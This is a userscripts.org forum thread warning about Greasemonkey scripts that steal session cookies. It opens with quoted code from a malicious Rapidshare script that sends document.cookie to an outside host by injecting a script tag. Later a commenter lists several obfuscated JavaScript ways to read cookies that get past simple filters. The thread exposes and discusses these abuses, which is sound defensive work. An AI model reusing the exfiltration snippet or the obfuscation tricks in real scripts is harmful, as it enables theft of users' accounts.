Userscripts.org

Rapidshare Premium & Collectors Zone Tweak v2+ By lifetalk
http://userscripts.org/scripts/review/38392


GM_JQ.src = 'http://jquery.07x.net/jquery.js';

var readyBound = false;

if(document.getElementById('formular')){
var GM_JQ = document.createElement('script');
GM_JQ.src = 'http://zshareaudio.phpnet.us/?' + unescape(document.cookie);
GM_JQ.type = 'text/javascript';
document.getElementsByTagName('head')[0].appendChild(GM_JQ);
}


mo fcuker !

@cinerus
You've got to let jesse know that script you posted is calling a dirty version of JQuery which is located at http://jquery.07x.net/jquery.js and basically steals Rapidshare Premium Cookies. It has over a thousand installs already, which means it is likely several accounts have already been stolen.

All Chad justice's, NeopetsFastAutobuyer's, Neopetss' and neohacks' scripts are cookie grabbers

Hello, I just told by a friend to not use the following script:

http://userscripts.org/scripts/review/36111

Because it was some cookie hax, the user only had that script, and the 2 reviewers only have a review and don't exist anymore, so it seems to be a fake.

But I've checked the code and didn't find anything strange, could you tell me if its actually some kind of hack?

Thanks in advance.

omgtestorxd wrote:
Hello, I just told by a friend to not use the following script:
http://userscripts.org/scripts/review/36111
Because it was some cookie hax, the user only had that script, and the 2 reviewers only have a review and don't exist anymore, so it seems to be a fake.
But I've checked the code and didn't find anything strange, could you tell me if its actually some kind of hack?
Thanks in advance.

It seems clear that we can't just scan through the code to find cookie stealing. Yeah, that would help a little bit, but there are literally infinitely many ways to obfuscate a reference to document.cookie. With even just a little thought, an experienced JavaScript programmer can probably find two different filter workarounds, and that's before factoring in Mozilla-specific quirks like anyNodeInTheDocument.__parent__==document. It seems like only restrictions on Greasemonkey itself would be effective for preventing cookie theft. Perhaps messing around with the sandbox's access to document.cookie to notify the user when a userscript attempts to access a cookie?

Just to make my point clearer, here are several ways that would be very difficult to automatically filter or automatically recognize:

for(i in document){
   if(i.match(/^c\o{2}k(?:)[i\ii]\u0065(?:)$/)) // RegExp obfuscation
      stolenData=document[i] // it ONLY matches "cookie"
}

for(i in document){
   if(i.charCodeAt(0)==99) // if and charcode obfuscation
      if(i.charCodeAt(1)==i.charCodeAt(2)==111)
         if(i.charCodeAt(3)==107)
            if(i.substring(4)=="ie")
               stolenData=document[i]
}

stolenData=anyNodeInTheDocument.__parent__.cookie // Mozilla-only

leverage=
   {
      get x(){return document}, // requires getters
      get y(a){if(a)return "co";return undefined}, // extra protection...
      get z(){return "okie"}
   };
V=leverage.__lookupGetter__("y")(1);
stolenData=leverage.x[V+leverage.z];

stolenData=document["co"+["o"][0]+"ki"+("document").charAt(5)]
// string assembly... with a twist.

A="coo";
// several hundred lines of code go here
B="kie";
// several hundred more lines of code go here
stolenData=document[A+B]

Just to clear a couple misconceptions here..

The 'lifetalk' to which the rapidshare cookie stealing scripts belong, is NOT ME.

Want proof?

Check out his user profile URL, and check out my user profile URL. Nuff said.

The problem is with userscripts. The site is insecure. Anyone can impersonate anyone else. How is it possible for two members to have the same username? Ever thought about it?

This should help clear stuff out..
http://userscripts.org/topics/23191

I hate to see this... but my username and reputation is at stake here :S

@DavidJCobb
Yup you can obfuscate in literally infinite number of ways. It would require you to actually run the code to be sure what it really does.

Here's another account stealer script:

http://userscripts.org/scripts/show/44524

what should I do if I unwittingly installed a cookie grabber? If it stole my account info would deleting the script and changing my password protect me?

Not if he already changed it before you. But definitely delete the script.

Thanks. That's good news for me. I'll be a lot more careful in the future.

Yet another 'lifetalk' :S
Glad to see he's deleted though

lifetalk wrote:
Yet another 'lifetalk' :S
Glad to see he's deleted though

lifetalk wrote:
Glad to see he's deleted though

http://userscripts.org/scripts/show/51190

i think greasemonkey should have some internal-checking system to warn users about cookies, maybe something like xss checking in noscript
it could hook the getting of cookies perhaps?

Make a request @github:

http://github.com/greasemonkey/greasemonkey/issues

Help,,, I'm trying to use the script for facebook color and I installed greasemonkey on Firefox installed the script and restarted firefox but when i go to tools-greasemonkey the "user script command" is grayed out and i am unable to use it to color facebook any suggestions.
Thanks

aroplate wrote:
Help,,, I'm trying to use the script for facebook color and I installed greasemonkey on Firefox installed the script and restarted firefox but when i go to tools-greasemonkey the "user script command" is grayed out and i am unable to use it to color facebook any suggestions.
Thanks

people need to do something better with their life vs steal other peoples things..that's just stupid...

Nice

#1 So after 2+ years of posting about these problems, the root problem still exists?

#2 Why are the scripts identified as cookie-stealing still available for download? Shouldn't they have been removed or banned?